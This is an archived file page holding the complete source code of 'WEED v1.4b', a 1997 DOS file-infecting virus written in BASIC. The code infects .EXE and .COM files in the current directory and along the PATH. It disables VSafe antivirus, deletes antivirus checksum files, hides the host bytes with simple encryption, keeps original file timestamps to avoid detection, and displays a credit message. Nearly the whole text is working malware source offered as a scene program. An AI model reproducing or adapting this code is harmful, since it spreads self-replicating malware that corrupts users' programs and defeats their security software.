Collection of Hack-Phreak Scene Programs

home *** CD-ROM | disk | FTP | other *** search

/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / CASIOCOL.ZIP / WEEDV14.ZIP / WEEDV14.ASI < prev

Wrap

Text File | 1997-04-13 | 10KB | 501 lines

dim virus_data(5850) dim host_data(5850) call sub "ibcritinit" randomize rem WEED v1.4b source code... Fucking alot better then before!!! :-) rem Define our encrypted data for later decryption. Data is encrypted rem during the compilation process. Do not tamper with tables in source! weedmsg$="UNiDEN ViRuS has infected this PC. (c)1997 RAiDERZ UsA" killfil1$="anti-vir.dat" killfil2$="chklist.ms" killfil3$="chklist.cps" notouch1$="COMMAND.COM" notouch2$="START.EXE" exe$="*.exe" com$="*.com" rem And now the real fun part, bunch of temp calls to decode our information rem above :) temp$=weedmsg$ gosub decode_mess: weedmsg$=output$ temp$=killfil1$ gosub decode_mess: killfil1$=output$ temp$=killfil2$ gosub decode_mess: killfil2$=output$ temp$=killfil3$ gosub decode_mess: killfil3$=output$ temp$=notouch1$ gosub decode_mess: notouch1$=output$ temp$=notouch2$ gosub decode_mess: notouch2$=output$ temp$=exe$ gosub decode_mess: exe$=output$ temp$=com$ gosub decode_mess: com$=output$ temp$=byebait$ gosub decode_mess: byebait$=output$ newattr=0 gosub vsafe_toggle: vsafebak=cx gosub toast_them: call sub "exename" hostname$ yourparm$=command$ yourparm$=ltrim$(yourparm$) yourparm$=rtrim$(yourparm$) yourparm$=" "+yourparm$ rem My new WEED virus! Oh so much more deadly! So much more spiffy! filename$=hostname$ hostsize&=filelen(filename$) virus_size=5850 virus_size&=5850& gosub get_attr: oldattr=newattr newattr=0 gosub set_attr: gosub open_file: bytesize=virus_size dx=varptr(virus_data(0)) gosub read_file: gosub close_file: newattr=oldattr gosub set_attr: rem Ok, now infect files presently in current directory! subdir=0 proc$=exe$ gosub start_virus: proc$=com$ gosub start_virus: rem Ok, now were going to target files along the path :) for n=0 to 100 call sub "path", n, virupath$ i=LEN(virupath$) if i=0 then done: b$=right$(virupath$,1) if b$<>"\" then virupath$=virupath$+"\" endif out1$=exe$ out2$=com$ subdir=1 proc$=virupath$+out1$ gosub start_virus: proc$=virupath$+out2$ gosub start_virus: next n done: filename$=hostname$ hostsize&=filelen(filename$) gosub get_attr: oldattr=newattr newattr=0 gosub set_attr: gosub open_file: gosub get_fdt: hosttemp&=hostsize&-virus_size& move_way&=hosttemp& gosub move_file_pointer: bytesize=virus_size dx=varptr(host_data(0)) gosub read_file: move_way&=0& gosub move_file_pointer: gosub dec_host: dx=varptr(host_data(0)) bytesize=virus_size gosub write_file: gosub set_fdt: gosub close_file: gosub strip_garbage: newattr=oldattr gosub set_attr: a=rnd(0) a=a mod 10 a=a+1 if a=1 then rem Ok, run Stars Section, if they press "/" we allow them to run rem original program! call sub "Stars_heh" endif if a=7 then rem Time to print message! :) print weedmsg$ a=5*18 gosub pause_exec: endif call hostname$, yourparm$ newattr=0 gosub vsafe_toggle: gosub toast_them: filename$=hostname$ gosub lets_infect: rem Hmm, lets see if our new host was able to make any files! subdir=0 proc$=exe$ gosub start_virus: proc$=com$ gosub start_virus: gosub toast_them: newattr=vsafebak gosub vsafe_toggle: end rem We have completed replication. all stop! start_virus: errcode=0 attr=6 kewl=0 do_not_proceed=0 search$=proc$ attrib=6 filename$=find first (search$, attrib) if error>0 then done_finding: t1$=ucase$(filename$) if t1$=notouch1$ then do_not_proceed=1 endif if t1$=notouch2$ then do_not_proceed=1 endif if do_not_proceed=0 then if subdir=1 then filename$=virupath$+filename$ endif gosub infect_check: if infected=0 then gosub lets_infect: endif endif while errcode=0 do_not_proceed=0 filename$=find continue if error>0 then done_finding: t1$=ucase$(filename$) if t1$=notouch1$ then do_not_proceed=1 endif if t1$=notouch2$ then do_not_proceed=1 endif if do_not_proceed=0 then if subdir=1 then filename$=virupath$+filename$ endif gosub infect_check: if infected=0 then gosub lets_infect: endif endif if kewl>4 then errcode=1 endif WEND done_finding: return Lets_infect: hostsize&=filelen(filename$) gosub get_attr: oldattr=newattr newattr=0 gosub set_attr: gosub open_file: gosub get_fdt: bytesize=virus_size dx=varptr(host_data(0)) gosub read_file: move_way&=0& gosub move_file_pointer: bytesize=virus_size dx=varptr(virus_data(0)) gosub write_file: move_way&=hostsize& gosub move_file_pointer: gosub enc_host: dx=varptr(host_data(0)) bytesize=virus_size gosub write_file: gosub set_fdt: kewl=kewl+1 gosub close_file: newattr=oldattr gosub set_attr: return REM ******* SYSTEM SUB-ROUTINES BELOW THIS LINE. DO NOT TREAD HERE! REM ******* THESE AREAS MUST NOT BE FOOLED WITH! get_attr: AX = &HEX4300 DX = VARPTR(Filename$) CX = NewAttr INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA) return set_attr: AX = &HEX4301 DX = VARPTR(Filename$) CX = NewAttr INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA) return vsafe_toggle: ax=&hexfa02 dx=&hex5945 bx=newattr int86(&hex16,ax,bx,cx,dx,na,na,na,na,na) return get_fdt: if file_handle>4 then AX=&HEX5700 BX=FILE_HANDLE INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA) NEWDATE=CX NEWTIME=DX endif RETURN set_fdt: if file_handle>4 then AX=&HEX5701 BX=FILE_HANDLE CX=NEWDATE DX=NEWTIME INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA) endif RETURN chklist: temp1$=filename$ if subdir=1 then filename$=virupath$+filename$ endif filename$=kill_this$ newattr=0 gosub set_attr: kill filename$ filename$=temp1$ return rem DOS int file i/o driven code beyond this point :) rem ax=&hex3d00 rem ax opens file for read in this mode :-) rem ax=&hex3d01 rem ax opens file for write in this mode :-) rem ax=&hex3d02 rem ax opens file for read/write access :) hehehe open_file: AX=&HEX3D02 DX = VARPTR(Filename$) INT86(&HEX21,AX,NA,na,DX,NA,NA,NA,NA,NA) file_handle=ax return write_file: rem this routine will write selected bytes at whatever current position rem from whatever buffer i choose into the file. rem if the routine did not write all data ax will not equal cx upon rem return from int call. rem define dx register before calling this routine to point to the rem memory address of the buffer area you want to write from. like so: rem dx=varptr(buffer(0)) rem cx is how many bytes to write :) if file_handle>4 then ax=&hex4000 bx=file_handle cx=bytesize int86(&hex21,ax,bx,cx,dx,na,na,na,na,na) byteswritten=ax endif return read_file: rem as the name implies, it reads bytes into a buffer. :-) rem as with write_file, you need to predefine the dx register for the rem buffer where you want the info stored. Like so: dx=varptr(buffer(0)) rem if you don't, this routine will not work, or will overwrite some rem other section of memory. And for virus coding, this is very bad! :) rem cx register is how many bytes to read :) if file_handle>4 then ax=&hex3f00 bx=file_handle cx=bytesize int86(&hex21,ax,bx,cx,dx,na,na,na,na,na) bytesread=ax endif return close_file: rem This routine will close the selected file. rem do not try to close handle 2, very nasty... :-( if file_handle>4 then ax=&hex3e00 bx=file_handle int86(&hex21,ax,bx,na,na,na,na,na,na,na) endif return move_file_pointer: rem be sure to set variable move_way to whereever you wish to go rem it can be a long integer :-) rem get the target location, divide that by 65536 rem Also subtract value of a& from the original size. rem set both registers for real numbers, no mistake here.. Will fuckup rem file pointer routine if I don't. :) rem a&=move_way&/65536& rem b&=a&-move_way& rem a&=abs(a&) rem b&=abs(b&) rem Now, dump the registers :) rem if file_handle>4 then rem ax=&hex4200 rem cx=a& rem dx=b& rem bx=file_handle rem Ok, now that we have prepared the registers, Lets fix them! rem if cx<0 then rem cx=cx+32767 rem endif rem if dx<0 then rem dx=dx+32767 rem endif rem int86(&hex21,ax,bx,cx,dx,na,na,na,na,na) rem endif rem return method=0 call sub "fseek" file_handle, move_way&, method, errcode return enc_host: rem Routine to encrypt the host data... We encrypt it before rem appending. Yea, the encryption is lame... But it serves it's rem purpose fine. for x=0 to virus_size a=host_data(x) a=a+187 a=a+121 a=a+x a=a-194 a=a-27 host_data(x)=a next x return dec_host: rem Routine to decrypt the host data... We need to decrypt it before rem replacing it and passing control to it. And yes, the decryption rem sequence is lame... But, I don't give a fuck! for x=0 to virus_size a=host_data(x) a=a-187 a=a-121 a=a-x a=a+194 a=a+27 host_data(x)=a next x return infect_check: gosub get_attr: newattr=oldattr newattr=0 gosub set_attr: sig$="" open"r",1,filename$ a=filepos(1,28) for z=1 to 4 input #1,y$ byte sig$=sig$+y$ next z close 1 newattr=oldattr gosub set_attr: if sig$="·▀ⁿ¡" then infected=1 else infected=0 endif return strip_garbage: open"r",1,filename$ a=filepos(1,hosttemp&) print #1,"" NONULL CLOSE 1 gosub open_file: gosub set_fdt: gosub close_file: return pause_exec: REM 5 sec. timer routine from original QBasic source code written by: REM obother@netcom.com (Glen Blankenship) REM (5 * 18.2 clock-ticks-per-second = 91) TickOne = TIMER FOR i = 1 TO a TickTwo = TickOne WHILE TickTwo = TickOne TickOne = TIMER WEND NEXT i RETURN toast_them: kill_this$=killfil1$ gosub chklist: kill_this$=killfil2$ gosub chklist: kill_this$=killfil3$ gosub chklist: return decode_mess: output$="" rem This routine decrypts our tables in the beginning to useable material rem For run-time use only. The data in the exe/com is not decrypted! r=len(temp$) for x=1 to r a$=mid$(temp$,x,1) a=asc(a$) a=a+127 a$=chr$(a) output$=output$+a$ next x return